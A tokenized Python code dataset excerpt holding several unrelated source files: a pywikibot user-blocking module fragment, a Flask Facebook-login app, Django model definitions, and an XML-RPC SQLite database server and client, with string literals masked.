_getBlockID ( ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return self . _unblockOld ( blockID , reason ) <EOL> self . _unblock ( blockID , reason ) <EOL> def _getBlockID ( self ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> if self . isAnonymous ( ) : <EOL> usertype = "<STR_LIT>" <EOL> else : <EOL> usertype = "<STR_LIT>" <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return getBlockIDOld ( ) <EOL> data = self . site ( ) . blocksearch_address ( self . name ( ) , usertype ) <EOL> try : <EOL> bIDre = data [ <NUM_LIT:1> ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> except IndexError : <EOL> pywikibot . output ( data ) <EOL> raise BlockIDError <EOL> return bIDre <EOL> def _unblock ( self , blockID , reason ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT:id>' : blockID , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( self , sysop = True ) , <EOL> } <EOL> data = query . GetData ( params , self . site ( ) , back_response = True , <EOL> sysop = True ) <EOL> if '<STR_LIT:error>' in data : <EOL> pywikibot . output ( "<STR_LIT>" % str ( data [ '<STR_LIT:error>' ] ) ) <EOL> return True <EOL> def _unblockOld ( self , blockID , reason ) : <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> token = self . site ( ) . getToken ( self , sysop = True ) <EOL> predata = { <EOL> '<STR_LIT:id>' : blockID , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token , <EOL> } <EOL> address = self . site ( ) . unblock_address ( ) <EOL> response , data = self . site ( ) . postForm ( address , predata , sysop = True ) <EOL> if response . code != <NUM_LIT> : <EOL> if self . site ( ) . mediawiki_message ( <EOL> '<STR_LIT>' ) . replace ( '<STR_LIT>' , blockID ) in data : <EOL> raise AlreadyUnblockedError <EOL> raise UnblockError ( data ) <EOL> return True <EOL> def getBlockIDOld ( self ) : <EOL> self . family . blocksearch_address ( self . lang , s ) <EOL> address = self . site ( ) . blocksearch_address ( self . name ( ) ) <EOL> data = self . site ( ) . getUrl ( address ) <EOL> bIDre = re . search ( r'<STR_LIT>' , data ) <EOL> if not bIDre : <EOL> pywikibot . output ( data ) <EOL> raise BlockIDError <EOL> return bIDre . group ( <NUM_LIT:1> ) <EOL> def getall ( site , users , throttle = True , force = False ) : <EOL> """<STR_LIT>""" <EOL> users = list ( users ) <EOL> if len ( users ) > <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( len ( users ) , site ) ) <EOL> if len ( users ) > <NUM_LIT> : <EOL> for urg in range ( <NUM_LIT:0> , len ( users ) , <NUM_LIT> ) : <EOL> if urg == range ( <NUM_LIT:0> , len ( users ) , <NUM_LIT> ) [ - <NUM_LIT:1> ] : <EOL> k = users [ urg : ] <EOL> _GetAllUI ( site , k , throttle , force ) . run ( ) <EOL> users [ urg : ] = k <EOL> else : <EOL> k = users [ urg : urg + <NUM_LIT> ] <EOL> _GetAllUI ( site , k , throttle , force ) . run ( ) <EOL> users [ urg : urg + <NUM_LIT> ] = k <EOL> else : <EOL> _GetAllUI ( site , users , throttle , force ) . run ( ) <EOL> class _GetAllUI ( object ) : <EOL> def __init__ ( self , site , users , throttle , force ) : <EOL> self . site = site <EOL> self . users = [ ] <EOL> self . throttle = throttle <EOL> self . force = force <EOL> self . sleeptime = <NUM_LIT:15> <EOL> for user in users : <EOL> if not hasattr ( user , '<STR_LIT>' ) or force : <EOL> self . users . append ( user ) <EOL> elif pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % user . name ( ) ) <EOL> def run ( self ) : <EOL> if self . users : <EOL> while True : <EOL> try : <EOL> data = self . getData ( ) <EOL> except Exception , e : <EOL> print e <EOL> raise <EOL> else : <EOL> break <EOL> for uj in self . users : <EOL> try : <EOL> x = data [ uj . name ( ) ] <EOL> except KeyError : <EOL> break <EOL> if '<STR_LIT>' in x : <EOL> break <EOL> uj . _editcount = x [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in x : <EOL> uj . _groups = x [ '<STR_LIT>' ] <EOL> else : <EOL> uj . _groups = [ ] <EOL> if x [ '<STR_LIT>' ] : <EOL> uj . _registrationTime = pywikibot . parsetime2stamp ( <EOL> x [ '<STR_LIT>' ] ) <EOL> else : <EOL> uj . _registrationTime = <NUM_LIT:0> <EOL> uj . _mailable = ( "<STR_LIT>" in x ) <EOL> uj . _blocked = ( '<STR_LIT>' in x ) <EOL> def getData ( self ) : <EOL> users = { } <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : u'<STR_LIT:|>' . join ( [ n . name ( ) for n in self . users ] ) , <EOL> } <EOL> data = query . GetData ( params , self . site ) <EOL> for user in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if u'<STR_LIT>' in user : <EOL> raise InvalidUser ( <EOL> "<STR_LIT>" <EOL> % user [ '<STR_LIT:name>' ] ) <EOL> users [ user [ '<STR_LIT:name>' ] ] = user <EOL> return users <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> """<STR_LIT>""" <EOL> pywikibot . output ( """<STR_LIT>""" ) <EOL> import tests . test_userlib <EOL> import unittest <EOL> unittest . main ( tests . test_userlib ) </s>
<s> import os <EOL> from flask import ( Flask , redirect , url_for , session , request , <EOL> render_template , g ) <EOL> from flask . ext . login import ( LoginManager , login_required , login_user , <EOL> logout_user , current_user ) <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask_oauth import OAuth <EOL> FACEBOOK_APP_ID = os . environ [ '<STR_LIT>' ] <EOL> FACEBOOK_APP_SECRET = os . environ [ '<STR_LIT>' ] <EOL> app = Flask ( __name__ ) <EOL> app . debug = True <EOL> app . secret_key = os . environ [ '<STR_LIT>' ] <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> db = SQLAlchemy ( app ) <EOL> class User ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> social_id = db . Column ( db . Integer , unique = True ) <EOL> name = db . Column ( db . String , nullable = False ) <EOL> email = db . Column ( db . String , nullable = True ) <EOL> def __init__ ( self , name , social_id , email = None ) : <EOL> self . name = name <EOL> self . social_id = social_id <EOL> self . email = email <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> return unicode ( self . id ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name ) <EOL> oauth = OAuth ( ) <EOL> login_manager = LoginManager ( ) <EOL> login_manager . init_app ( app ) <EOL> login_manager . login_view = '<STR_LIT>' <EOL> facebook = oauth . remote_app ( '<STR_LIT>' , <EOL> base_url = '<STR_LIT>' , <EOL> request_token_url = None , <EOL> access_token_url = '<STR_LIT>' , <EOL> authorize_url = '<STR_LIT>' , <EOL> consumer_key = FACEBOOK_APP_ID , <EOL> consumer_secret = FACEBOOK_APP_SECRET , <EOL> request_token_params = { '<STR_LIT>' : '<STR_LIT:email>' } <EOL> ) <EOL> @ login_manager . unauthorized_handler <EOL> def unauthorized ( ) : <EOL> return "<STR_LIT>" <EOL> @ login_manager . user_loader <EOL> def load_user ( id ) : <EOL> return User . query . get ( int ( id ) ) <EOL> @ app . before_request <EOL> def before_request ( ) : <EOL> g . user = current_user <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ facebook . authorized_handler <EOL> def facebook_authorized ( resp ) : <EOL> if resp is None : <EOL> return '<STR_LIT>' % ( <EOL> request . args [ '<STR_LIT>' ] , <EOL> request . args [ '<STR_LIT>' ] <EOL> ) <EOL> session [ '<STR_LIT>' ] = ( resp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> me = facebook . get ( '<STR_LIT>' ) . data <EOL> user = User . query . filter_by ( social_id = me [ '<STR_LIT:id>' ] ) . first ( ) <EOL> print user <EOL> if user is not None : <EOL> login_user ( user ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> else : <EOL> if "<STR_LIT:email>" in me : <EOL> user = User ( me [ '<STR_LIT:name>' ] , me [ '<STR_LIT:id>' ] , me [ '<STR_LIT:email>' ] ) <EOL> else : <EOL> user = User ( me [ '<STR_LIT:name>' ] , me [ '<STR_LIT:id>' ] ) <EOL> db . session . add ( user ) <EOL> db . session . commit ( ) <EOL> login_user ( user ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ facebook . tokengetter <EOL> def get_facebook_oauth_token ( ) : <EOL> return session . get ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def user ( ) : <EOL> return render_template ( '<STR_LIT>' , user = current_user ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def login ( ) : <EOL> if current_user . is_anonymous ( ) : <EOL> return facebook . authorize ( callback = url_for ( '<STR_LIT>' , <EOL> next = request . args . get ( '<STR_LIT>' ) or request . referrer or None , <EOL> _external = True ) ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def logout ( ) : <EOL> logout_user ( ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> db . create_all ( ) <EOL> app . run ( port = <NUM_LIT> ) </s>
<s> from django . db import models <EOL> class Product ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> price = models . DecimalField ( max_digits = <NUM_LIT:10> , decimal_places = <NUM_LIT:2> ) <EOL> class Cart ( models . Model ) : <EOL> items = models . ManyToManyField ( Product , through = "<STR_LIT>" ) <EOL> class CartItem ( models . Model ) : <EOL> product = models . ForeignKey ( Product ) <EOL> cart = models . ForeignKey ( Cart ) <EOL> quantity = models . PositiveIntegerField ( default = <NUM_LIT:1> ) <EOL> def get_item_amount ( self , instance ) : <EOL> return self . product . price * self . quantity <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . quantity , self . product . name ) </s>
<s> from django . db import models <EOL> class Page ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" , blank = True ) <EOL> type = models . CharField ( max_length = <NUM_LIT:50> , default = "<STR_LIT>" , blank = True ) <EOL> content = models . TextField ( default = "<STR_LIT>" , blank = True ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . type ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . title or self . content <EOL> class Product ( models . Model ) : <EOL> meta_description = models . TextField ( default = "<STR_LIT>" ) <EOL> meta_keywords = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> meta_title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . id ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . meta_title <EOL> class Category ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> page_title = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ "<STR_LIT:abc>" ] , { } ) <EOL> class NoPath ( models . Model ) : <EOL> pass <EOL> class Tag ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , default = "<STR_LIT>" ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , [ self . name ] , { } ) <EOL> def __unicode__ ( self ) : <EOL> return self . name </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import shutil <EOL> import tempfile <EOL> import sqlite3 <EOL> import cPickle <EOL> import base64 <EOL> import zlib <EOL> import xmlrpclib <EOL> import SocketServer <EOL> import socket <EOL> from SimpleXMLRPCServer import ( SimpleXMLRPCServer , SimpleXMLRPCRequestHandler ) <EOL> try : <EOL> from sage . rings . all import is_Integer , is_RealNumber <EOL> except : <EOL> is_Integer = lambda x : False <EOL> is_RealNumber = lambda x : False <EOL> class VerifyingServer ( SocketServer . ForkingMixIn , <EOL> SimpleXMLRPCServer ) : <EOL> def __init__ ( self , username , password , * args , ** kargs ) : <EOL> self . username = username <EOL> self . password = password <EOL> class VerifyingRequestHandler ( SimpleXMLRPCRequestHandler ) : <EOL> def parse_request ( myself ) : <EOL> if SimpleXMLRPCRequestHandler . parse_request ( myself ) : <EOL> if self . authenticate ( myself . headers ) : <EOL> return True <EOL> else : <EOL> myself . send_error ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return False <EOL> SimpleXMLRPCServer . __init__ ( self , <EOL> requestHandler = VerifyingRequestHandler , <EOL> logRequests = False , <EOL> * args , ** kargs ) <EOL> def authenticate ( self , headers ) : <EOL> ( basic , _ , encoded ) = headers . get ( '<STR_LIT>' ) . partition ( '<STR_LIT:U+0020>' ) <EOL> assert basic == '<STR_LIT>' , '<STR_LIT>' <EOL> ( username , _ , password ) = base64 . b64decode ( encoded ) . partition ( '<STR_LIT::>' ) <EOL> return username == self . username and password == self . password <EOL> class Server ( object ) : <EOL> """<STR_LIT>""" <EOL> _test_mode = False <EOL> def __init__ ( self , <EOL> username = '<STR_LIT:username>' , password = '<STR_LIT:password>' , <EOL> directory = '<STR_LIT>' , <EOL> address = "<STR_LIT:localhost>" , port = <NUM_LIT> , <EOL> auto_run = True ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in username or '<STR_LIT>' in password or '<STR_LIT>' in address or '<STR_LIT>' in directory : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . pid = <NUM_LIT:0> <EOL> self . test = self . __class__ . _test_mode <EOL> if self . test : <EOL> directory = tempfile . mkdtemp ( ) <EOL> self . directory = str ( directory ) <EOL> self . username = username <EOL> self . password = password <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> self . address = str ( address ) <EOL> self . port = int ( port ) <EOL> self . _dbs = { } <EOL> if auto_run : <EOL> self . _run ( ) <EOL> def __del__ ( self ) : <EOL> try : <EOL> self . quit ( ) <EOL> finally : <EOL> if hasattr ( self , '<STR_LIT:test>' ) and self . test : <EOL> shutil . rmtree ( self . directory , ignore_errors = True ) <EOL> def db ( self , file ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _dbs [ file ] <EOL> except KeyError : <EOL> db = sqlite3 . connect ( file ) <EOL> self . _dbs [ file ] = db <EOL> return db <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) and self . pid : <EOL> os . kill ( self . pid , <NUM_LIT:9> ) <EOL> self . pid = <NUM_LIT:0> <EOL> def _run ( self , max_tries = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> port = self . port <EOL> success = False <EOL> for i in range ( max_tries ) : <EOL> try : <EOL> server = VerifyingServer ( <EOL> self . username , self . password , <EOL> ( self . address , port ) , allow_none = True ) <EOL> success = True <EOL> break <EOL> except socket . error : <EOL> port += <NUM_LIT:1> <EOL> if not success : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . port = port <EOL> pid = os . fork ( ) <EOL> if pid != <NUM_LIT:0> : <EOL> self . pid = pid <EOL> self . port = port <EOL> return port <EOL> def execute ( cmds , t , file = '<STR_LIT:default>' , many = False ) : <EOL> db = self . db ( os . path . join ( self . directory , file ) if file != '<STR_LIT>' else file ) <EOL> cursor = db . cursor ( ) <EOL> if isinstance ( cmds , str ) : <EOL> if t is not None : <EOL> cmds = [ ( cmds , t ) ] <EOL> else : <EOL> cmds = [ cmds ] <EOL> v = [ ] <EOL> for c in cmds : <EOL> try : <EOL> if isinstance ( c , tuple ) : <EOL> o = cursor . executemany ( * c ) if many else cursor . execute ( * c ) <EOL> else : <EOL> o = cursor . execute ( c ) <EOL> except sqlite3 . OperationalError , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> v . extend ( list ( o ) ) <EOL> db . commit ( ) <EOL> return v <EOL> server . register_function ( execute , '<STR_LIT>' ) <EOL> server . serve_forever ( ) <EOL> def help ( self ) : <EOL> """<STR_LIT>""" <EOL> fqdn = socket . getfqdn ( ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> print ( self ) <EOL> s = "<STR_LIT>" % ( self . port , self . username ) <EOL> if self . address != '<STR_LIT:localhost>' : <EOL> s += "<STR_LIT>" % self . address <EOL> else : <EOL> s += "<STR_LIT:)>" <EOL> print s <EOL> print ( "<STR_LIT>" ) <EOL> if self . address == '<STR_LIT:localhost>' : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( self . port , self . port , fqdn ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ( self . port , self . username ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % os . getpid ( ) ) <EOL> print ( "<STR_LIT:->" * <NUM_LIT> ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . pid == <NUM_LIT:0> : <EOL> return "<STR_LIT>" <EOL> s = "<STR_LIT>" % self . port <EOL> if self . address != '<STR_LIT:localhost>' : <EOL> s += '<STR_LIT>' % self . address <EOL> return s <EOL> class LocalServer ( object ) : <EOL> def __init__ ( self , directory ) : <EOL> self . directory = directory <EOL> self . _dbs = { } <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> def db ( self , file ) : <EOL> try : <EOL> return self . _dbs [ file ] <EOL> except KeyError : <EOL> db = sqlite3 . connect ( file ) <EOL> self . _dbs [ file ] = db <EOL> return db <EOL> def execute ( self , cmds , t , file = '<STR_LIT:default>' , many = False ) : <EOL> db = self . db ( os . path . join ( self . directory , file ) if file != '<STR_LIT>' else file ) <EOL> cursor = db . cursor ( ) <EOL> if isinstance ( cmds , str ) : <EOL> if t is not None : <EOL> cmds = [ ( cmds , t ) ] <EOL> else : <EOL> cmds = [ cmds ] <EOL> v = [ ] <EOL> for c in cmds : <EOL> try : <EOL> if isinstance ( c , tuple ) : <EOL> o = cursor . executemany ( * c ) if many else cursor . execute ( * c ) <EOL> else : <EOL> o = cursor . execute ( c ) <EOL> except sqlite3 . OperationalError , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> v . extend ( list ( o ) ) <EOL> db . commit ( ) <EOL> return v <EOL> socket . setdefaulttimeout ( <NUM_LIT:10> ) <EOL> class Client ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , port_or_dir = <NUM_LIT> , username = '<STR_LIT:username>' , password = '<STR_LIT:password>' , <EOL> address = "<STR_LIT:localhost>" ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in str ( port_or_dir ) or '<STR_LIT>' in username or '<STR_LIT>' in password or '<STR_LIT>' in address : <EOL> raise ValueError , '<STR_LIT>' <EOL> if isinstance ( port_or_dir , str ) : <EOL> self . server = LocalServer ( port_or_dir ) <EOL> else : <EOL> self . address = str ( address ) <EOL> self . port = int ( port_or_dir ) <EOL> self . server = xmlrpclib . Server ( '<STR_LIT>' % <EOL> ( username , password , address , self . port ) , <EOL> allow_none = True ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> s = "<STR_LIT>" % self . port <EOL> if self . address != '<STR_LIT:localhost>' : <EOL> s += '<STR_LIT>' % self . address <EOL> return s <EOL> def __call__ ( self , cmd , t = None , file = '<STR_LIT:default>' , many = False , coerce = True ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( cmd , str ) : <EOL> raise TypeError ( "<STR_LIT>" % cmd ) <EOL> if coerce : <EOL> if many : <EOL> t = [ tuple ( [ self . _coerce_ ( x ) for x in y ] ) for y in t ] <EOL> else : <EOL> if t is not None : <EOL> t = tuple ( [ self . _coerce_ ( x ) for x in t ] ) <EOL> try : <EOL> return self . server . execute ( cmd , t , file , many ) <EOL> except xmlrpclib . Fault , e : <EOL> raise RuntimeError , str ( e ) + '<STR_LIT>' % cmd <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name == '<STR_LIT>' : <EOL> name = '<STR_LIT>' <EOL> return Database ( self , name ) <EOL> def _coerce_ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( x , bool ) : <EOL> x = int ( x ) <EOL> elif isinstance ( x , ( str , int , long , float ) ) : <EOL> pass <EOL> elif x is None : <EOL> pass <EOL> elif is_Integer ( x ) and x . nbits ( ) < <NUM_LIT:32> : <EOL> x = int ( x ) <EOL> elif is_RealNumber ( x ) and x . prec ( ) == <NUM_LIT> : <EOL> return float ( x ) <EOL> elif isinstance ( x , unicode ) : <EOL> return str ( x ) <EOL> else : <EOL> x = '<STR_LIT>' + base64 . b64encode ( zlib . compress ( cPickle . dumps ( x , <NUM_LIT:2> ) ) ) <EOL> return x <EOL> def _coerce_back_ ( self , x ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( x , ( str , unicode ) ) and x . startswith ( '<STR_LIT>' ) : <EOL> return cPickle . loads ( zlib . decompress ( base64 . b64decode ( x [ <NUM_LIT:8> : ] ) ) ) <EOL> return x <EOL> class Database ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , name ) : <EOL> """<STR_LIT>""" <EOL> self . client = client <EOL> self . name = str ( name ) <EOL> def vacuum ( self ) : <EOL> """<STR_LIT>""" <EOL> self ( '<STR_LIT>' ) <EOL> def __call__ ( self , cmds , t = None , many = False , coerce = True ) : <EOL> """<STR_LIT>""" <EOL> return self . client ( cmds , t , file = self . name , many = many , coerce = coerce ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return Collection ( self , name ) <EOL> def trait_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ C . name for C in self . collections ( ) ] <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % self . name <EOL> def collections ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" <EOL> return [ Collection ( self , x [ <NUM_LIT:0> ] ) for x in self ( cmd ) ] <EOL> class Collection ( object ) : <EOL> def __init__ ( self , database , name ) : <EOL> """<STR_LIT>""" <EOL> self . database = database <EOL> self . name = str ( name ) <EOL> def __call__ ( self , * args , ** kwds ) : <EOL> return self . database ( * args , ** kwds ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( self . database . name , self . name ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cmd = '<STR_LIT>' % self . name <EOL> return int ( self . database ( cmd ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> except RuntimeError : <EOL> if len ( self . _columns ( ) ) == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> raise <EOL> def _validate_column_names ( self , columns ) : <EOL> """<STR_LIT>""" <EOL> for c in columns : <EOL> if '<STR_LIT:">' in c : <EOL> raise ValueError , "<STR_LIT>" % c <EOL> def _create ( self , columns ) : <EOL> """<STR_LIT>""" <EOL> self . _validate_column_names ( columns ) <EOL> self . database ( '<STR_LIT>' % ( self . name , '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % s for s in columns ) ) ) <EOL> def insert ( self , d = None , coerce = True , on_conflict = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if d is None : <EOL> d = kwds <EOL> elif isinstance ( d , dict ) : <EOL> d . update ( kwds ) <EOL> else : <EOL> if len ( kwds ) > <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> if isinstance ( d , list ) : <EOL> keys = set ( ) . union ( * d ) <EOL> else : <EOL> keys = set ( d . keys ( ) ) <EOL> current_cols = self . _columns ( ) <EOL> new_columns = keys . difference ( current_cols ) <EOL> if len ( current_cols ) == <NUM_LIT:0> : <EOL> self . _create ( new_columns ) <EOL> else : <EOL> self . _add_columns ( new_columns ) <EOL> if isinstance ( d , list ) : <EOL> for v in _constant_key_grouping ( d ) : <EOL> cmd = _insert_statement ( self . name , v [ <NUM_LIT:0> ] . keys ( ) , on_conflict ) <EOL> self . database ( cmd , [ x . values ( ) for x in v ] , many = True , coerce = coerce ) <EOL> else : <EOL> self . database ( _insert_statement ( self . name , d . keys ( ) , on_conflict ) , d . values ( ) , coerce = coerce ) <EOL> def rename ( self , new_name ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % ( self . name , new_name ) <EOL> self . database ( cmd ) <EOL> self . name = new_name <EOL> def copy ( self , collection , query = '<STR_LIT>' , fields = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( collection , str ) : <EOL> collection = self . database . __getattr__ ( collection ) <EOL> fields = self . _columns ( ) if fields is None else fields <EOL> other = collection . _columns ( ) <EOL> cols = set ( fields ) . difference ( other ) <EOL> if len ( other ) == <NUM_LIT:0> : <EOL> collection . _create ( cols ) <EOL> elif cols : <EOL> collection . _add_columns ( cols ) <EOL> c = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % x for x in fields ] ) <EOL> cmd = '<STR_LIT>' % ( <EOL> collection . name , c , c , self . name , self . _where_clause ( query , kwds ) ) <EOL> self . database ( cmd ) <EOL> def update ( self , d , query = '<STR_LIT>' , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> new_cols = set ( d . keys ( ) ) . difference ( self . _columns ( ) ) <EOL> if new_cols : <EOL> self . _add_columns ( new_cols ) <EOL> t = tuple ( [ self . database . client . _coerce_ ( x ) for x in d . values ( ) ] ) <EOL> s = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % x for x in d . keys ( ) ] ) <EOL> cmd = '<STR_LIT>' % ( <EOL> self . name , s , self . _where_clause ( query , kwds ) ) <EOL> self . database ( cmd , t ) <EOL> def export_csv ( self , csvfile , delimiter = '<STR_LIT:U+0020>' , quotechar = '<STR_LIT:|>' , order_by = None , write_columns = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( csvfile , str ) : <EOL> csvfile = open ( csvfile , '<STR_LIT:wb>' ) <EOL> import csv <EOL> W = csv . writer ( csvfile , delimiter = delimiter , quotechar = quotechar , quoting = csv . QUOTE_MINIMAL ) <EOL> cmd = '<STR_LIT>' % self . name <EOL> if order_by is not None : <EOL> cmd += '<STR_LIT>' % order_by <EOL> if write_columns : <EOL> W . writerow ( self . columns ( ) ) <EOL> for x in self . database ( cmd ) : <EOL> W . writerow ( [ '<STR_LIT>' % a for a in x ] ) <EOL> def import_csv ( self , csvfile , columns = None , delimiter = '<STR_LIT:U+0020>' , quotechar = '<STR_LIT:|>' ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( csvfile , str ) : <EOL> csvfile = open ( csvfile , '<STR_LIT:rb>' ) <EOL> import csv <EOL> R = csv . reader ( csvfile , delimiter = delimiter , quotechar = quotechar ) <EOL> if columns is None : <EOL> columns = R . next ( ) <EOL> d = [ ] <EOL> for x in R : <EOL> z = { } <EOL> for i in range ( len ( x ) ) : <EOL> y = x [ i ] <EOL> if y != '<STR_LIT>' : <EOL> if y . isdigit ( ) : <EOL> y = eval ( y ) <EOL> else : <EOL> v = y . split ( '<STR_LIT:.>' ) <EOL> if len ( v ) == <NUM_LIT:2> and v [ <NUM_LIT:0> ] . isdigit ( ) and v [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> y = eval ( y ) <EOL> z [ columns [ i ] ] = y <EOL> d . append ( z ) <EOL> self . insert ( d ) <EOL> def delete ( self , query = '<STR_LIT>' , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if not query and len ( kwds ) == <NUM_LIT:0> : <EOL> if len ( self . _columns ( ) ) == <NUM_LIT:0> : <EOL> return <EOL> cmd = '<STR_LIT>' % self . name <EOL> else : <EOL> cmd = '<STR_LIT>' % ( self . name , self . _where_clause ( query , kwds ) ) <EOL> self . database ( cmd ) <EOL> def _index_pattern ( self , kwds ) : <EOL> """<STR_LIT>""" <EOL> cols = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( column , '<STR_LIT>' if direction < <NUM_LIT:0> else '<STR_LIT>' ) for <EOL> column , direction in sorted ( kwds . iteritems ( ) ) ] ) <EOL> index_name = '<STR_LIT>' % ( self . name , cols . replace ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) ) <EOL> return cols , index_name <EOL> def ensure_index ( self , unique = None , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> if len ( kwds ) == <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> cols , index_name = self . _index_pattern ( kwds ) <EOL> current_cols = self . columns ( ) <EOL> 